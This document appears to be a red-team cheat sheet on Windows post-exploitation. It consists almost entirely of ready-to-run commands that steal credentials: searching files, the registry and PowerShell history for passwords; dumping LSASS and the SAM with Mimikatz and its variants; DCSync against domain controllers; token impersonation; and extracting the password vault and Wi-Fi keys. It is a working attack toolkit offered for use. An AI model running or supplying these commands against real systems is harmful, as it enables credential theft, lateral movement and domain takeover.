Post-Exploitation.md

Post-Exploitation

• Find credentials in files
• Dumping LSASS
• Dumping SAM
• Mimikatz
• DC-Sync
• Token manipulation
• DPAPI

Find credentials in files

Look for SAM files

Get-ChildItem -path C:\Windows\Repair\* -include *.SAM*,*.SYSTEM* -force -Recurse 
Get-ChildItem -path C:\Windows\System32\config\RegBack\*  -include *.SAM*,*.SYSTEM* -force -Recurse
Get-ChildItem -path C:\* -include *.SAM*,*.SYSTEM* -force -Recurse 

Check registery for passwords

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Find autologon credentials registery key

Get-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" -Name "DefaultPassword"

Look for unattend and sysprep files

Get-ChildItem -path C:\* -Recurse -Include *Unattend.xml*
Get-ChildItem -path C:\Windows\Panther\* -Recurse -Include *Unattend.xml* 
Get-ChildItem -path C:\Windows\system32\* -Recurse -Include *sysgrep.xml*, *sysgrep.inf* 
Get-ChildItem -path C:\* -Recurse -Include *Unattend.xml*, *sysgrep.xml*, *sysgrep.inf* 

Get powershell history path and cat history

Get-PSReadlineOption
cat <path>

Look for powershell history files

Get-Childitem -Path C:\Users\* -Force -Include *ConsoleHost_history* -Recurse -ErrorAction SilentlyContinue

Look for hardcoded passwords in scripts

Get-ChildItem -path C:\*  -Recurse -Include *.xml,*.ps1,*.bat,*.txt  | Select-String "password"| Export-Csv C:\Scripts\Report.csv -NoTypeInformation
Get-ChildItem -path C:\*  -Recurse -Include *.xml,*.ps1,*.bat,*.txt  | Select-String "creds"| Export-Csv C:\Scripts\Report.csv -NoTypeInformation

Check for Azure tokens

Get-ChildItem -path "C:\Users\*" -Recurse -Include *accessTokens.json*, *TokenCache.dat*, *AzureRmContext.json*

Dump password vault

[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

Dumping LSASS

Crackmapexec

cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> --lsa
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> -M lsassy

DumpCreds

Invoke-MimiKatz -DumpCreds

Dump credentials on a local machine using Mimikatz.

Invoke-Mimikatz -Command '"sekurlsa::ekeys"' 

Using SafetyKatz (Minidump of lsass and PELoader to run Mimikatz)

SafetyKatz.exe "sekurlsa::ekeys"

Dump credentials Using SharpKatz (C# port of some of Mimikatz functionality).

SharpKatz.exe --Command ekeys

Dump credentials using Dumpert (Direct System Calls and API unhooking)

rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

Using pypykatz (Mimikatz functionality in Python)

pypykatz.exe live lsa

Use task manager

• Find lsass process in details tab
• Right click and select create dump file

Manually

Get-Process lsass
rundll32.exe C:\windows\System32\comsvc.dll, MiniDump <LSASS PROCESS ID> C:\Users\lsass.dmp full
mimikatz.exe
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full

Dumping SAM

Crackmapexec

cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> --lsa
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> -M lsassy

Mimikatz dump SAM

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'

Manually

reg save HKLM\SAM SamBkup.hiv
reg save HKLM\System SystemBkup.hiv

mimikatz.exe
mimikatz # lsadump::sam SamBkup.hiv SystemBkup.hiv

Mimikatz

• Check out https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md for more commands

Mimikatz dump credentials on local machine

Invoke-Mimikatz -Dumpcreds

Mimikatz dump credentials on multiple remote machines

Invoke-Mimikatz -Dumpcreds -ComputerName @("<COMPUTERNAME 1>","<COMPUTERNAME2>")

Mimikatz dump certs

Invoke-Mimikatz –DumpCerts

Mimikatz dump vault

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "vault::cred /patch" "vault::list"'

Mimikatz dump all to find privs

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "sekurlsa::tickets /export" "kerberos::list /export" "vault::cred /patch" "vault::list" "lsadump::sam" "lsadump::secrets" "lsadump::cache"'

DC Sync

• Extract creds from the DC without code execution using DA privileges.

Mimikatz DCSync attack specific user

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<USER> /domain:<DOMAIN>"'

Mimikatz DCSync attack everything

Invoke-Mimikatz -Command '"lsadump::dcsync /all"'

Safetykatz.exe

SafetyKatz.exe "lsadump::dcsync /user:<DOMAIN>\<USER>" "exit"

Token manipulation

• https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1

List all tokens on a machine

Invoke-TokenManipulation –ShowAll

List all unique, usable tokens on the machine

Invoke-TokenManipulation -Enumerate

Start a new process with token of a specific user

Invoke-TokenManipulation -ImpersonateUser -Username “domain\user"

Start news process with token of another process

Invoke-TokenManipulation -CreateProcess "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ProcessId 500

Get the wifi password

Get saved wifi networks

netsh wlan show profiles

Get key from saved wifi network

netsh wlan show profiles name=<NAME> key=clear

DPAPI

• https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++